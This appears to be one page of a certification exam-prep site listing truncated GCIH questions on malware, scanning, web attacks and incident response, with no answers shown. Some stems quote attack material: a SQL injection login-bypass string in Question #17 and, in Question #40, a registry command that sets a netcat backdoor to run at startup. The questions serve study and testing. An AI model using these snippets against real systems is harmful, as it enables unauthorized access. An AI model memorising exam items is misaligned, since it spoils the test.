GCIH Exam Questions
829 real GCIH exam questions with expert-verified answers and explanations. Page 1 of 17.
- Question #1Malware Analysis & Advanced Persistent Threats
Which of the following applications is an example of a data-sending Trojan?
Trojan typesdata-sending Trojanmalware classificationeBlaster - Question #2Web Application Attacks & Post-Exploitation
John works as a professional Ethical Hacker. He has been assigned a project to test the security and successfully logs in to the user page of the Web site. The we-are-secure login...
SQL injectionlogin bypassweb authenticationinput validation - Question #3Malware Analysis & Advanced Persistent Threats
Which of the following statements are true about worms? Each correct answer represents a complete solution. Choose all that apply.
worm characteristicsmalware propagationnetwork bandwidthself-replication - Question #4Malware Analysis & Advanced Persistent Threats
Adam works as a Security Analyst for Umbrella Inc. Company has a Windows-based network. All computers run on Windows XP. Manager of the Sales department complains Adam about the un...
NetBusTrojan identificationport fingerprintingmalware indicators - Question #5Vulnerability Exploitation & Privilege Escalation
Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a vari...
buffer overflowstack-based overflowheap-based overflowmemory exploitation - Question #6Incident Response & Cyber Kill Chain
Which of the following are the primary goals of the incident handling team? Each correct answer represents a complete solution. Choose all that apply.
incident handling goalsincident responsedamage containmentscene preservation - Question #8Reconnaissance, Scanning, and Enumeration
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
vulnerability scanningNessusdictionary attackHydra integration - Question #9Malware Analysis & Advanced Persistent Threats
Which of the following statements are true about a keylogger? Each correct answer represents a complete solution. Choose all that apply.
keyloggerspywareremote installationuser activity monitoring - Question #10Web Application Attacks & Post-Exploitation
John works as a professional Ethical Hacker. He has been assigned a project to test the security server. The output of the scanning test is as follows: C:\whisker.pl -h target_IP_a...
CGI vulnerabilitiesprintenvcross-site scriptingweb server enumeration - Question #11Vulnerability Exploitation & Privilege Escalation
Which of the following statements about buffer overflow is true?
buffer overflowmemory managementvulnerability definitiondata overflow - Question #12Reconnaissance, Scanning, and Enumeration
Which of the following commands is used to access Windows resources from Linux workstation?
smbclientSMB protocolWindows resource accesscross-platform enumeration - Question #13Reconnaissance, Scanning, and Enumeration
Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealth at this point. Which of the following type of scans woul...
TCP connect scanport scanningscan reliabilitynetwork reconnaissance - Question #14Malware Analysis & Advanced Persistent Threats
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from whic...
browser virtualizationsandboxingmalware preventionweb security - Question #15Incident Response & Cyber Kill Chain
Which of the following statements about Denial-of-Service (DoS) attack are true? Each correct answer represents a complete solution. Choose three.
denial of servicenetwork disruptionservice availabilityDoS attack types - Question #16Reconnaissance, Scanning, and Enumeration
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows...
passive reconnaissanceOSINTfootprintinginformation gathering - Question #17Web Application Attacks & Post-Exploitation
John works as a Professional Penetration Tester. He has been assigned a project to test the ='or''=' as a username and successfully logs on to the user page of the Web site. Now, J...
SQL injection preventioninput sanitizationPHP securitymysql_real_escape_string - Question #18Reconnaissance, Scanning, and Enumeration
You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correc...
brute force attackpassword crackingauthentication attackscredential stuffing - Question #19Reconnaissance, Scanning, and Enumeration
You want to scan your network quickly to detect live hosts by using ICMP ECHO Requests. What type of scanning will you perform to accomplish the task?
ping sweepICMP echohost discoverynetwork scanning - Question #20Reconnaissance, Scanning, and Enumeration
Adam, a malicious hacker is running a scan. Statistics of the scan is as follows: Scan directed at open port: ClientServer 192.5.2.92:4079 ---------FIN--------->192.5.2.110:23192.5...
FIN scanTCP flagsport scanning techniquestraffic analysis - Question #21Malware Analysis & Advanced Persistent Threats
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?
Conficker wormRPC vulnerabilitynetwork wormWindows exploit - Question #22Reconnaissance, Scanning, and Enumeration
Which of the following statements are true about netcat? Each correct answer represents a complete solution. Choose all that apply.
netcatTCP/UDP connectionsfile transfertunneling - Question #23Incident Response & Cyber Kill Chain
Which of the following types of attacks is mounted with the objective of causing a negative impact on the performance of a computer or network?
DoS attackattack typesdenial of serviceperformance impact - Question #24Web Application Attacks & Post-Exploitation
Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?
session hijackingunauthorized accesssession exploitation - Question #25Malware Analysis & Advanced Persistent Threats
Which of the following malicious software travels across computer networks without the assistance of a user?
wormmalware typesself-propagationnetwork spread - Question #26Malware Analysis & Advanced Persistent Threats
What is the major difference between a worm and a Trojan horse?
wormTrojan horsemalware comparisonself-replication - Question #27Web Application Attacks & Post-Exploitation
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progres...
keyloggersocial engineeringfirewall evasioninsider threat - Question #28Vulnerability Exploitation & Privilege Escalation
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single domain single forest network. The company has three Windows...
NFSUser Name Mappingcross-platform accessSSO - Question #29Web Application Attacks & Post-Exploitation
Which of the following methods can be used to detect session hijacking attack?
session hijacking detectionnetwork sniffertraffic analysis - Question #30Incident Response & Cyber Kill Chain
DOS attacks. Which of the following is most useful against DOS attacks?
SPI firewallDoS protectionstateful packet inspection - Question #31Vulnerability Exploitation & Privilege Escalation
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmen...
ICMP covert channelHping2firewall rulesICMP type 13 - Question #32Vulnerability Exploitation & Privilege Escalation
Which of the following are types of access control attacks? Each correct answer represents a complete solution. Choose all that apply.
spoofingbrute forcedictionary attackaccess control attacks - Question #33Incident Response & Cyber Kill Chain
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks? Each correct answer represents a complete solution. Choose all that apply.
layer 2 attacksSYN floodspoofingDoS - Question #34Incident Response & Cyber Kill Chain
You check performance logs and note that there has been a recent dramatic increase in the amount of broadcast traffic. What is this most likely to be an indicator of?
broadcast trafficDoS indicatornetwork anomalyperformance monitoring - Question #35Reconnaissance, Scanning, and Enumeration
Which of the following is a reason to implement security logging on a DNS server?
DNS securityzone transfer monitoringsecurity loggingDNS reconnaissance - Question #36Malware Analysis & Advanced Persistent Threats
Which of the following tools combines two programs, and also encrypts the resulting package in an attempt to foil antivirus programs?
EliteWraptrojan builderAV evasionmalware packaging - Question #37Malware Analysis & Advanced Persistent Threats
Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?
SpectorspywarekeyloggerMac malware - Question #38Reconnaissance, Scanning, and Enumeration
You work as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The company wants to fix potential vulnerabilities existing on the tested systems....
Nessusvulnerability scanningmisconfigurationpatch management - Question #39Reconnaissance, Scanning, and Enumeration
Which of the following statements are true about firewalking? Each correct answer represents a complete solution. Choose all that apply.
firewalkingTTL manipulationfirewall bypassnetwork reconnaissance - Question #40Vulnerability Exploitation & Privilege Escalation
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192...
Windows registry persistenceNetcat backdoorregistry run keypost-exploitation - Question #41Malware Analysis & Advanced Persistent Threats
You have inserted a Trojan on your friend's computer and you want to put it in the startup so that whenever the computer reboots the Trojan will start to run on the startup. Which...
Windows registrypersistence mechanismTrojan startupRunServices - Question #42Reconnaissance, Scanning, and Enumeration
Which of the following is the best method of accurately identifying the services running on a victim host?
service enumerationbanner grabbingport scanningtelnet - Question #43Incident Response & Cyber Kill Chain
Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows...
covering trackscyber kill chainpost-exploitationincident indicators - Question #44Web Application Attacks & Post-Exploitation
Which of the following functions can be used as a countermeasure to a Shell Injection attack? Each correct answer represents a complete solution. Choose all that apply.
shell injectioninput sanitizationescapeshellargescapeshellcmd - Question #45Reconnaissance, Scanning, and Enumeration
Which of the following Nmap commands is used to perform a UDP port scan?
NmapUDP scanport scanningscan flags - Question #46Web Application Attacks & Post-Exploitation
You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your...
vulnerability scanningweb application securitypenetration testingflaw detection - Question #47Web Application Attacks & Post-Exploitation
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the...
IIS configurationbuffer overflow protectionweb server hardening404 error handling - Question #48Web Application Attacks & Post-Exploitation
Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?
SQL injectionsingle quoteinjection testinginput validation - Question #49Malware Analysis & Advanced Persistent Threats
Which of the following tools can be used to detect the steganography?
steganography detectiondigital forensicscovert channelsDskprobe - Question #50Reconnaissance, Scanning, and Enumeration
In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?
TCP FIN scanWindows RST behaviorport scanningscan techniques - Question #51Reconnaissance, Scanning, and Enumeration
Which of the following tools is used to download the Web pages of a Website on the local system?
wgetwebsite mirroringweb reconnaissanceOSINT tools